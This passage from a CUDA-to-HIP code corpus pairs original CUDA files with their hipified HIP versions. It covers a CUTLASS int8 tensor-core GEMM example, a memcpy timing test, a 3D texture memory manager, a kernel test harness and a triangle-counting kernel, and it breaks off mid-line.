pointer cutlass::Status status = gemm_op.initialize(arguments, workspace.get()); CUTLASS_CHECK(status); // Launch initialized CUTLASS kernel status = gemm_op(); CUTLASS_CHECK(status); // Create instantiation for device reference gemm kernel cutlass::reference::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementComputeEpilogue, ElementComputeEpilogue> gemm_device; // Launch device reference gemm kernel gemm_device(problem_size, alpha, tensor_a.device_ref(), tensor_b.device_ref(), beta, tensor_c.device_ref(), tensor_ref_d.device_ref()); // Wait for kernels to finish hipDeviceSynchronize(); // Copy output data from CUTLASS and reference kernel to host for comparison tensor_d.sync_host(); tensor_ref_d.sync_host(); // Check if output from CUTLASS kernel and reference kernel are equal or not std::cout << (cutlass::reference::host::TensorEquals(tensor_d.host_view(), tensor_ref_d.host_view()) ? "Passed" : "Failed") << std::endl; CUTLASS_CHECK(status); return 0; }
0699e8415e9039caef46daf879eba05cbb7209a8.cu
/*************************************************************************************************** * Copyright (c) 2017-2019, NVIDIA CORPORATION. All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, are permitted * provided that the following conditions are met: * * Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, this list of * conditions and the following disclaimer in the documentation and/or other materials * provided with the distribution. * * Neither the name of the NVIDIA CORPORATION nor the names of its contributors may be used * to endorse or promote products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND * FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TOR (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * **************************************************************************************************/ /** This example shows how to run matrix multiplication kernels using functions and data structures provided by CUTLASS using tensor cores; which we run on a NVIDIA Turing GPU. Writing a single high performance matrix multiplication kernel is hard but do-able. Whereas writing high performance kernels at scale which works for multiple problem sizes with good abstractions is really hard. CUTLASS solves this problem by providing simplified abstractions to compose multiple sections of gemm kernel. When used properly, the kernels can hit peak performance of GPU easily. CUTLASS divides a kernel into hierarchical composable sections. Which means, at each thread, warp and thread-block level, they compute on their own tile-size with higher level of tile sizes being composed from lower level ones. Multiple thread-tiles (tile size each thread computes) can be used to form warp-tiles (tile size each warp computes) and multiple warp tiles can be used to compute threadblock-tile (tile size computed by a threadblock). In thie example, we split variable initialization into 1. Setting up data properties : describes how matrices are laid out in the memory and how the kernel can view them (logical to physical mapping) 2. Setting up computation properties : describes how the above set matrices will be used to compute output of matrix multiplication. First, we setup the data types of matrices A, B, C and D along with alpha, beta as the equation for GEMM is D = alpha * A * B + beta * C. In CUTLASS, the kernels first compute A * B and leaves the rest of the computation to end of the kernel as alpha * X + beta * C is a simple element-wise operation on X (A * B) and C. We call this as epilogue of kernel. Hence, we setup data types for alpha and beta to be equal to ElementComputeEpilogue = int32_t. As we want to use MMA instructions on Turing and they support 8-bit signed integer (int8_t), we use data type for elements in input matrix A and B as int8_t. Volta also supports accumulation of partial dot product to int32_t, which can store wider range of numbers, we use it as data type of output matrix elements and accumulation. We convey this to CUTLASS kernel by initializing template variables ElementAccumulator (int32_t), ElementComputeEpilogue (int32_t), ElementInputA (int8_t), ElementInputB (int8_t), ElementOutput (int32_t). Communicating just the data type is not enough. As the data is laid out linearly in memory, we have to convey the layout of matrices. We do that by initializing template variable LayoutInputA to column major cutlass variable, LayoutInputB to row major and LayoutOutput to row major. Next, we setup rules to comptue alpha * X + beta * C which is called epilogue of the kernel. We initialize template variable EpilogueOp, which takes the data type of output ElementOutput (int32_t), the number of elements per vector memory access (16), data type of accumulator (int32_t) and data type of computation of linear combination (alpha * X + beta * C). Now that we setup the properties of data, we have to setup properties of computation. Second, we create template variables of tile sizes for thread-block, warp and mma-op to 128x256x64, 64x64x16, 8x8x16 (MxNxK) respectively. When passed to instantiate CUTLASS GEMM kernel, it internally deduce the amount of threads needed per thread-block, amount of shared memory, storing data in bank-conflict free manner, and ton of other variables required to compose, intialize and launch a high performance GEMM kernel. This is the beauty of CUTLASS, it relieves developer from understanding and coding complicated hardware optimizations which can easily go wrong. CUTLASS also supports multiple MMA pipelines in a threadblock. What are MMA pipelines? MMA pipelines constitute the whole process of loading input data from global memory to shared memory, loading data from shared memory to registers, doing matrix multiplication, store to global memory. The below flow sequence shows a typical mma pipeline. matrix in global memory -> registers -> tile in shared memory -> registers -> mma -> registers -> output to global memory The problem with single pipeline is, each stage is synchronous which means, each stage has to wait until the previous finished executing. There are stages in the pipeline which do not have fixed latency, for example, the loads from global memory and shared memory. Therefore, we can add one more pipeline with a phase shift in mma kernel to hide latency from global and shared memory loads. Finally, the pipeline in a kernel looks like (1) matrix in global memory -> (2) registers -> (3) tile in shared memory -> (4) registers -> (5) mma -> (6) registers -> (7) output to global memory (1) <null> -> (2) <null> -> (3) matrix in global memory -> (4) registers -> (5) tile in shared memory -> (6) registers -> (7) mma -> (8) registers -> (9) output to global memory This way, you can hide the second global memoroy load latency by doing computation on already loaded input data. There are few more template variables initialized such as, which threadblock tile of output matrix is done which threadblock launched on an SM, CUDA SM architecture of GPU you want to run on. These are all put together to create a template variable which describes CUTLASS GEMM kernel using cutlass::gemm::device::Gemm template. The next step is to intialize physical data, instantiate and initialize CUTLASS kernel and run it. We use CUTLASS utilities to initialize, fill, compare matrices as they are simple and doesn't come in the way of learning CUTLASS. Once all the matrices are initialized and filled with data, create arguments tuple to launch CUTLASS kernel which takes problem size (M = 5120, N = 4096 and K = 4096), matrices, alpha, beta and the important one, split k-dimension factor. Along with that, we query CUTLASS if any scratch-space memory required by the kernel we instantiated. If yes, we create it and pass it along with other arguments created to intialize CUTLASS kernel then, the kernel is launched. In this example, we later on launch a reference gemm kernel (from CUTLASS utilities) to compare if the output from CUTLASS kernel is same as reference GEMM kernel. */ #include <iostream> #include "cutlass/cutlass.h" #include "cutlass/gemm/device/gemm.h" #include "cutlass/util/host_tensor.h" #include "cutlass/util/reference/device/gemm.h" #include "cutlass/util/reference/host/tensor_compare.h" #include "cutlass/util/reference/host/tensor_copy.h" #include "cutlass/util/reference/host/tensor_fill.h" #include "cutlass/util/tensor_view_io.h" #include "helper.h" // The code section below describes datatype for input, output matrices and computation between // elements in input matrices. using ElementAccumulator = int32_t; // <- data type of accumulator using ElementComputeEpilogue = ElementAccumulator; // <- data type of epilogue operations using ElementInputA = int8_t; // <- data type of elements in input matrix A using ElementInputB = int8_t; // <- data type of elements in input matrix B using ElementOutput = int32_t; // <- data type of elements in output matrix D // The code section below describes matrix layout of input and output matrices. Column Major for // Matrix A, Row Major for Matrix B and Row Major for Matrix C using LayoutInputA = cutlass::layout::RowMajor; using LayoutInputB = cutlass::layout::ColumnMajor; using LayoutOutput = cutlass::layout::RowMajor; // This code section describes whether you want to use tensor cores or regular SIMT cores on GPU SM using MMAOp = cutlass::arch::OpClassTensorOp; // This code section describes CUDA SM architecture number using SmArch = cutlass::arch::Sm75; // This code section describes the tile size a thread block will compute using ShapeMMAThreadBlock = cutlass::gemm::GemmShape<128, 256, 64>; // <- threadblock tile M = 128, N = 256, K = 64 // This code section describes tile size a warp will compute using ShapeMMAWarp = cutlass::gemm::GemmShape<64, 64, 64>; // <- warp tile M = 64, N = 64, K = 16 // This code section describes the size of MMA op using ShapeMMAOp = cutlass::gemm::GemmShape<8, 8, 16>; // <- MMA Op tile M = 8, N = 8, K = 16 // This code section describes how threadblocks are scheduled on GPU using SwizzleThreadBlock = cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle; // <- ?? // This code section describes the epilogue part of the kernel using EpilogueOp = cutlass::epilogue::thread::LinearCombination< ElementOutput, // <- data type of output matrix 128 / cutlass::sizeof_bits<ElementOutput>::value, // <- the number of elements per vectorized // memory access. For a byte, it's 16 // elements. This becomes the vector width of // math instructions in the epilogue too ElementAccumulator, // <- data type of accumulator ElementComputeEpilogue>; // <- data type for alpha/beta in linear combination function // Number of pipelines you want to use constexpr int NumStages = 2; using Gemm = cutlass::gemm::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementAccumulator, MMAOp, SmArch, ShapeMMAThreadBlock, ShapeMMAWarp, ShapeMMAOp, EpilogueOp, SwizzleThreadBlock, NumStages>; int main() { // Turing Tensor Core operations exposed with mma.sync and ldmatrix are first available // in CUDA 10.2. // // CUTLASS must be compiled with CUDA 10.2 Toolkit to run these examples. if (!(__CUDACC_VER_MAJOR__ > 10 || (__CUDACC_VER_MAJOR__ == 10 && __CUDACC_VER_MINOR__ >= 2))) { std::cerr << "Turing Tensor Core operations must be compiled with CUDA 10.2 Toolkit or later." << std::endl; return -1; } cudaDeviceProp props; cudaError_t error = cudaGetDeviceProperties(&props, 0); if (error != cudaSuccess) { std::cerr << "cudaGetDeviceProperties() returned an error: " << cudaGetErrorString(error) << std::endl; return -1; } if (!((props.major * 10 + props.minor) >= 75)) { std::cerr << "Turing Tensor Core operations must be run on a machine with compute capability at least 75." << std::endl; return -1; } const int length_m = 5120; const int length_n = 4096; const int length_k = 4096; // Create a tuple of problem size for matrix multiplication cutlass::gemm::GemmCoord problem_size(length_m, length_n, length_k); // Initialize tensors using CUTLASS helper functions cutlass::HostTensor<ElementInputA, LayoutInputA> tensor_a( problem_size.mk()); // <- Create matrix A with dimensions M x K cutlass::HostTensor<ElementInputB, LayoutInputB> tensor_b( problem_size.nk()); // <- Create matrix B with dimensions N x K cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_c( problem_size.mn()); // <- Create matrix C with dimensions M x N cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // CUTLASS kernel cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_ref_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // reference kernel // Fill input and output matrices on host using CUTLASS helper functions cutlass::reference::host::TensorFillRandomUniform( tensor_a.host_view(), 1, ElementInputA(4), ElementInputA(-4), 0); // <- Fill matrix A on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_b.host_view(), 1, ElementInputB(4), ElementInputB(-4), 0); // <- Fill matrix B on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_c.host_view(), 1, ElementOutput(4), ElementOutput(-4), 0); // <- Fill matrix C on host with uniform-distribution random data cutlass::reference::host::TensorFill( tensor_d.host_view()); // <- fill matrix D on host with zeros cutlass::reference::host::TensorFill( tensor_ref_d.host_view()); // <- fill matrix D for reference on host with zeros // Copy data from host to GPU tensor_a.sync_device(); tensor_b.sync_device(); tensor_c.sync_device(); tensor_d.sync_device(); tensor_ref_d.sync_device(); // Initialize alpha and beta for dot product computation ElementComputeEpilogue alpha = ElementComputeEpilogue(1); ElementComputeEpilogue beta = ElementComputeEpilogue(0); // Split K dimension into 1 partitions int split_k_slices = 1; // Create a tuple of gemm kernel arguments. This is later passed as arguments to launch // instantiated CUTLASS kernel typename Gemm::Arguments arguments{problem_size, // <- problem size of matrix multiplication tensor_a.device_ref(), // <- reference to matrix A on device tensor_b.device_ref(), // <- reference to matrix B on device tensor_c.device_ref(), // <- reference to matrix C on device tensor_d.device_ref(), // <- reference to matrix D on device {alpha, beta}, // <- tuple of alpha and beta split_k_slices}; // <- k-dimension split factor // Using the arguments, query for extra workspace required for matrix multiplication computation size_t workspace_size = Gemm::get_workspace_size(arguments); // Allocate workspace memory cutlass::device_memory::allocation<uint8_t> workspace(workspace_size); // Instantiate CUTLASS kernel depending on templates Gemm gemm_op; // Initialize CUTLASS kernel with arguments and workspace pointer cutlass::Status status = gemm_op.initialize(arguments, workspace.get()); CUTLASS_CHECK(status); // Launch initialized CUTLASS kernel status = gemm_op(); CUTLASS_CHECK(status); // Create instantiation for device reference gemm kernel cutlass::reference::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementComputeEpilogue, ElementComputeEpilogue> gemm_device; // Launch device reference gemm kernel gemm_device(problem_size, alpha, tensor_a.device_ref(), tensor_b.device_ref(), beta, tensor_c.device_ref(), tensor_ref_d.device_ref()); // Wait for kernels to finish cudaDeviceSynchronize(); // Copy output data from CUTLASS and reference kernel to host for comparison tensor_d.sync_host(); tensor_ref_d.sync_host(); // Check if output from CUTLASS kernel and reference kernel are equal or not std::cout << (cutlass::reference::host::TensorEquals(tensor_d.host_view(), tensor_ref_d.host_view()) ? "Passed" : "Failed") << std::endl; CUTLASS_CHECK(status); return 0; }
ef081f016fd7dd530e8083a224daa7234412905c.hip
// !!! This is a file automatically generated by hipify!!! #define PG (4*1024) #include <stdio.h> int main(void) { int N = 2044*1024; float *x, *d_x; x = (float*)malloc(N*sizeof(float)); hipMalloc(&d_x, N*sizeof(float)); for (int i = 0; i < N; i++) { x[i] = 0; } hipEvent_t start, end; float time; int current = 0; hipEventCreate(&start); hipEventCreate(&end); hipEventRecord(start); for (int i = 0; i < 9; i++) { hipMemcpy((d_x+current), (x+current), (int)(1024*pow(2.0,(i+2))), hipMemcpyHostToDevice); current += (int)(1024*pow(2.0,(i+2))); } hipEventRecord(end); hipEventSynchronize(end); hipEventElapsedTime(&time, start, end); printf("time: %f\n", time); // Free memory hipFree(d_x); free(x); return 0; }
ef081f016fd7dd530e8083a224daa7234412905c.cu
#define PG (4*1024) #include <stdio.h> int main(void) { int N = 2044*1024; float *x, *d_x; x = (float*)malloc(N*sizeof(float)); cudaMalloc(&d_x, N*sizeof(float)); for (int i = 0; i < N; i++) { x[i] = 0; } cudaEvent_t start, end; float time; int current = 0; cudaEventCreate(&start); cudaEventCreate(&end); cudaEventRecord(start); for (int i = 0; i < 9; i++) { cudaMemcpy((d_x+current), (x+current), (int)(1024*pow(2.0,(i+2))), cudaMemcpyHostToDevice); current += (int)(1024*pow(2.0,(i+2))); } cudaEventRecord(end); cudaEventSynchronize(end); cudaEventElapsedTime(&time, start, end); printf("time: %f\n", time); // Free memory cudaFree(d_x); free(x); return 0; }
aa908474c53195cb8f6afbad9dfa20b5819c9daa.hip
// !!! This is a file automatically generated by hipify!!! /****************************************************************************/ /* Copyright (c) 2011, Javor Kalojanov * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ /****************************************************************************/ #include "CUDAStdAfx.h" #include "Core/Algebra.hpp" #include "RT/Structure/3DTextureMemoryManager.h" HOST void TextureMemoryManager::checkResolution() { if (resX <= 0 || resY <= 0 || resZ <= 0) { cudastd::logger::out << "Invalid texture resolution!" << " Setting texture resolution to 32 x 32 x 32\n"; resX = resY = resZ = 32; } } ////////////////////////////////////////////////////////////////////////// //data transfer related ////////////////////////////////////////////////////////////////////////// HOST void TextureMemoryManager::copyDataDeviceToHost() { hipMemcpy3DParms cpyParamsDownloadPtr = { 0 }; cpyParamsDownloadPtr.srcPtr = texelPtrDevice; cpyParamsDownloadPtr.dstPtr = texelPtrHost; cpyParamsDownloadPtr.extent = make_hipExtent(resX * sizeof(float3), resY, resZ); cpyParamsDownloadPtr.kind = hipMemcpyDeviceToHost; MY_CUDA_SAFE_CALL( hipMemcpy3D(&cpyParamsDownloadPtr) ); } HOST void TextureMemoryManager::copyDataHostToDevice() { hipMemcpy3DParms cpyParamsUploadPtr = { 0 }; cpyParamsUploadPtr.srcPtr = texelPtrHost; cpyParamsUploadPtr.dstPtr = texelPtrDevice; cpyParamsUploadPtr.extent = make_hipExtent(resX * sizeof(float3), resY, resZ); cpyParamsUploadPtr.kind = hipMemcpyHostToDevice; MY_CUDA_SAFE_CALL( hipMemcpy3D(&cpyParamsUploadPtr) ); } ////////////////////////////////////////////////////////////////////////// //memory allocation ////////////////////////////////////////////////////////////////////////// HOST hipPitchedPtr TextureMemoryManager::allocateDataHost() { checkResolution(); freeDataHost(); MY_CUDA_SAFE_CALL( hipHostMalloc((void**)&texelsHost, resX * resY * resZ * sizeof(float3))); texelPtrHost = make_hipPitchedPtr(texelsHost, resX * sizeof(float3), resX * sizeof(float3), resY); return texelPtrHost; } HOST hipPitchedPtr TextureMemoryManager::allocateDataDevice() { checkResolution(); if(oldResX == resX && oldResY == resY && oldResZ == resZ) { return texelPtrDevice; } freeDataDevice(); //texelPtrDevice = // make_hipPitchedPtr(texelsDevice, resX * sizeof(float3), resX, resY); hipExtent cellDataExtent = make_hipExtent(resX * sizeof(float3), resY, resZ); MY_CUDA_SAFE_CALL( hipMalloc3D(&texelPtrDevice, cellDataExtent) ); oldResX = resX; oldResY = resY; oldResZ = resZ; return texelPtrDevice; } HOST void TextureMemoryManager::setDeviceCellsToZero() { MY_CUDA_SAFE_CALL( hipMemset(texelPtrDevice.ptr, 0 , texelPtrDevice.pitch * resY * resZ ) ); } ////////////////////////////////////////////////////////////////////////// //memory deallocation ////////////////////////////////////////////////////////////////////////// HOST void TextureMemoryManager::freeDataDevice() { MY_CUDA_SAFE_CALL( hipFree((char*)texelPtrDevice.ptr) ); texelPtrDevice.ptr = NULL; } HOST void TextureMemoryManager::freeDataHost() { MY_CUDA_SAFE_CALL( hipHostFree((char*)texelPtrHost.ptr) ); texelPtrHost.ptr = NULL; } HOST void TextureMemoryManager::cleanup() { freeDataHost(); if(oldResX + oldResY + oldResZ != 0) { freeDataDevice(); oldResX = oldResY = oldResZ = 0; resX = resY = resZ = -1; } }
aa908474c53195cb8f6afbad9dfa20b5819c9daa.cu
/****************************************************************************/ /* Copyright (c) 2011, Javor Kalojanov * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ /****************************************************************************/ #include "CUDAStdAfx.h" #include "Core/Algebra.hpp" #include "RT/Structure/3DTextureMemoryManager.h" HOST void TextureMemoryManager::checkResolution() { if (resX <= 0 || resY <= 0 || resZ <= 0) { cudastd::logger::out << "Invalid texture resolution!" << " Setting texture resolution to 32 x 32 x 32\n"; resX = resY = resZ = 32; } } ////////////////////////////////////////////////////////////////////////// //data transfer related ////////////////////////////////////////////////////////////////////////// HOST void TextureMemoryManager::copyDataDeviceToHost() { cudaMemcpy3DParms cpyParamsDownloadPtr = { 0 }; cpyParamsDownloadPtr.srcPtr = texelPtrDevice; cpyParamsDownloadPtr.dstPtr = texelPtrHost; cpyParamsDownloadPtr.extent = make_cudaExtent(resX * sizeof(float3), resY, resZ); cpyParamsDownloadPtr.kind = cudaMemcpyDeviceToHost; MY_CUDA_SAFE_CALL( cudaMemcpy3D(&cpyParamsDownloadPtr) ); } HOST void TextureMemoryManager::copyDataHostToDevice() { cudaMemcpy3DParms cpyParamsUploadPtr = { 0 }; cpyParamsUploadPtr.srcPtr = texelPtrHost; cpyParamsUploadPtr.dstPtr = texelPtrDevice; cpyParamsUploadPtr.extent = make_cudaExtent(resX * sizeof(float3), resY, resZ); cpyParamsUploadPtr.kind = cudaMemcpyHostToDevice; MY_CUDA_SAFE_CALL( cudaMemcpy3D(&cpyParamsUploadPtr) ); } ////////////////////////////////////////////////////////////////////////// //memory allocation ////////////////////////////////////////////////////////////////////////// HOST cudaPitchedPtr TextureMemoryManager::allocateDataHost() { checkResolution(); freeDataHost(); MY_CUDA_SAFE_CALL( cudaMallocHost((void**)&texelsHost, resX * resY * resZ * sizeof(float3))); texelPtrHost = make_cudaPitchedPtr(texelsHost, resX * sizeof(float3), resX * sizeof(float3), resY); return texelPtrHost; } HOST cudaPitchedPtr TextureMemoryManager::allocateDataDevice() { checkResolution(); if(oldResX == resX && oldResY == resY && oldResZ == resZ) { return texelPtrDevice; } freeDataDevice(); //texelPtrDevice = // make_cudaPitchedPtr(texelsDevice, resX * sizeof(float3), resX, resY); cudaExtent cellDataExtent = make_cudaExtent(resX * sizeof(float3), resY, resZ); MY_CUDA_SAFE_CALL( cudaMalloc3D(&texelPtrDevice, cellDataExtent) ); oldResX = resX; oldResY = resY; oldResZ = resZ; return texelPtrDevice; } HOST void TextureMemoryManager::setDeviceCellsToZero() { MY_CUDA_SAFE_CALL( cudaMemset(texelPtrDevice.ptr, 0 , texelPtrDevice.pitch * resY * resZ ) ); } ////////////////////////////////////////////////////////////////////////// //memory deallocation ////////////////////////////////////////////////////////////////////////// HOST void TextureMemoryManager::freeDataDevice() { MY_CUDA_SAFE_CALL( cudaFree((char*)texelPtrDevice.ptr) ); texelPtrDevice.ptr = NULL; } HOST void TextureMemoryManager::freeDataHost() { MY_CUDA_SAFE_CALL( cudaFreeHost((char*)texelPtrHost.ptr) ); texelPtrHost.ptr = NULL; } HOST void TextureMemoryManager::cleanup() { freeDataHost(); if(oldResX + oldResY + oldResZ != 0) { freeDataDevice(); oldResX = oldResY = oldResZ = 0; resX = resY = resZ = -1; } }
7f41158206296e7697790071a62e7a44382e9774.hip
// !!! This is a file automatically generated by hipify!!! #include <iostream> #include <unistd.h> #include <hip/hip_runtime.h> #include <helper_cuda.h> #include <helper_functions.h> #include <stdint.h> #include "hooklib.h" #include "protocol.hpp" #include "slimfast.hpp" #include "consumer.hpp" #include "impl.hpp" #include "devlogger.hpp" static const int NUM_BLOCKS = 2; static const int NUM_THREADS = 2; static const int NUM_TOTAL = NUM_BLOCKS * NUM_THREADS; static const int NUM_VALUES = 3; __device__ unsigned int counter = 0; __global__ void producer(unsigned int* data) { int id = ((blockDim.x * blockIdx.x) + threadIdx.x); for(int i = 0; i < NUM_VALUES; ++i ) { data[id] += 1; __store_op(&data[id], OP_READ); __store_op(&data[id], OP_WRITE); } } /// host code int main(int argc, char* argv[]) { Impl impl; // Launch the kernel. unsigned int* dev_data; checkCudaErrors(hipMalloc(&dev_data, sizeof(unsigned int) * NUM_TOTAL)); checkCudaErrors(hipMemset(dev_data, 0, sizeof(unsigned int) * NUM_TOTAL)); unsigned int* host_data = (unsigned int*)malloc(sizeof(unsigned int) * NUM_TOTAL); hipLaunchKernelGGL(( producer), dim3(NUM_BLOCKS), dim3(NUM_THREADS), 0, 0, dev_data); checkCudaErrors(hipDeviceSynchronize()); checkCudaErrors(hipMemcpy(host_data, dev_data, sizeof(unsigned int) * NUM_TOTAL, hipMemcpyDeviceToHost)); for(int i = 0; i < NUM_TOTAL; ++ i) { if(host_data[i] != NUM_VALUES) { fprintf(stderr, "Error at index: %i\n", i); exit(-1); } } return 0; }
7f41158206296e7697790071a62e7a44382e9774.cu
#include <iostream> #include <unistd.h> #include <cuda_runtime.h> #include <helper_cuda.h> #include <helper_functions.h> #include <stdint.h> #include "hooklib.h" #include "protocol.hpp" #include "slimfast.hpp" #include "consumer.hpp" #include "impl.hpp" #include "devlogger.hpp" static const int NUM_BLOCKS = 2; static const int NUM_THREADS = 2; static const int NUM_TOTAL = NUM_BLOCKS * NUM_THREADS; static const int NUM_VALUES = 3; __device__ unsigned int counter = 0; __global__ void producer(unsigned int* data) { int id = ((blockDim.x * blockIdx.x) + threadIdx.x); for(int i = 0; i < NUM_VALUES; ++i ) { data[id] += 1; __store_op(&data[id], OP_READ); __store_op(&data[id], OP_WRITE); } } /// host code int main(int argc, char* argv[]) { Impl impl; // Launch the kernel. unsigned int* dev_data; checkCudaErrors(cudaMalloc(&dev_data, sizeof(unsigned int) * NUM_TOTAL)); checkCudaErrors(cudaMemset(dev_data, 0, sizeof(unsigned int) * NUM_TOTAL)); unsigned int* host_data = (unsigned int*)malloc(sizeof(unsigned int) * NUM_TOTAL); producer<<<NUM_BLOCKS, NUM_THREADS>>>(dev_data); checkCudaErrors(cudaDeviceSynchronize()); checkCudaErrors(cudaMemcpy(host_data, dev_data, sizeof(unsigned int) * NUM_TOTAL, cudaMemcpyDeviceToHost)); for(int i = 0; i < NUM_TOTAL; ++ i) { if(host_data[i] != NUM_VALUES) { fprintf(stderr, "Error at index: %i\n", i); exit(-1); } } return 0; }
9f206e5885080195687b3c6b4fb6fa38e366f19a.hip
// !!! This is a file automatically generated by hipify!!! #include "gg.h" #include "ggcuda.h" #include "hipcub/hipcub.hpp" #include "hipcub/hipcub.hpp" #include "thread_work.h" void kernel_sizing(CSRGraph &, dim3 &, dim3 &); #define TB_SIZE 256 #include "kernels/reduce.cuh" #include "tc_cuda.cuh" #include "kernels/segmentedsort.cuh" #include "moderngpu.cuh" #include "util/mgpucontext.h" #include <hip/hip_runtime_api.h> mgpu::ContextPtr mgc; #define WARP_SIZE 32 inline __device__ unsigned long intersect(CSRGraph graph, index_type u, index_type v) { index_type u_start = graph.getFirstEdge(u); index_type u_end = u_start + graph.getOutDegree(u); index_type v_start = graph.getFirstEdge(v); index_type v_end = v_start + graph.getOutDegree(v); unsigned long count = 0; index_type u_it = u_start; index_type v_it = v_start; index_type a; index_type b; while (u_it < u_end && v_it < v_end) { a = graph.getAbsDestination(u_it); b = graph.getAbsDestination(v_it); int d = a - b; if (d <= 0) u_it++; if (d >= 0) v_it++; if (d == 0) count++; } return count; } __global__ void base(CSRGraph graph, unsigned begin, unsigned end, HGAccumulator<unsigned long> num_local_triangles) { unsigned tid = blockIdx.x * blockDim.x + threadIdx.x; unsigned long local_total = 0; __shared__ hipcub::BlockReduce<unsigned long, TB_SIZE>::TempStorage num_local_triangles_ts; num_local_triangles.thread_entry(); for (index_type src = begin + tid; src < end; src += TOTAL_THREADS_1D) { index_type row_begin = graph.getFirstEdge(src); index_type row_end = row_begin + graph.getOutDegree(src); for (index_type offset = row_begin; offset < row_end; ++ offset) { index_type dst = graph.getAbsDestination(offset); local_total = intersect(graph, dst, src); if (local_total) num_local_triangles.reduce(local_total); } } num_local_triangles.thread_exit<hipcub::BlockReduce<unsigned long, TB_SIZE> >(num_local_triangles_ts); } inline __device__ bool serial_search(CSRGraph graph, unsigned key, index_type begin, index_type end) { for (index_type offset = begin; offset < end; ++ offset) { index_type d = graph.getAbsDestination(offset); if (d == key) return true; if (d > key) return false; } return false; } inline __device__ bool binary_search(CSRGraph graph, index_type key, index_type begin, index_type end) { assert(begin < end); int l = begin; int r = end-1; while (r >= l) { //assert(l<graph.nedges && r<graph.nedges); int mid = l + (r - l) / 2; if (mid >= graph.nedges) printf("mid=%u, l=%u, r=%u, begin=%u, end=%u, key=%u\n", mid, l, r, begin, end, key); assert(mid < graph.nedges); index_type value = graph.getAbsDestination(mid); if (value == key) return true; if (value < key) l = mid + 1; else r = mid - 1; } return false; } __global__ void warp(CSRGraph graph, unsigned begin, unsigned end, HGAccumulator<unsigned long> num_local_triangles) { unsigned thread_id = blockIdx.x * blockDim.x + threadIdx.x; unsigned thread_lane = threadIdx.x & (WARP_SIZE-1); // thread index within the warp unsigned warp_id = thread_id / WARP_SIZE; // global warp index unsigned warp_lane = threadIdx.x / WARP_SIZE; // warp index within the CTA unsigned num_warps = (TB_SIZE / WARP_SIZE) * gridDim.x; // total number of active warps __shared__ hipcub::BlockReduce<unsigned long, TB_SIZE>::TempStorage num_local_triangles_ts; num_local_triangles.thread_entry(); // each warp takes one vertex for (index_type src = begin + warp_id; src < end; src += num_warps) { index_type row_begin = graph.getFirstEdge(src); index_type src_size = graph.getOutDegree(src); index_type row_end = row_begin + src_size; // take one edge for (index_type offset = row_begin; offset < row_end; offset ++) { index_type dst = graph.getAbsDestination(offset); assert(src != dst); index_type dst_size = graph.getOutDegree(dst); index_type lookup = src; index_type search = dst; if (src_size > dst_size) { lookup = dst; search = src; } index_type lookup_begin = 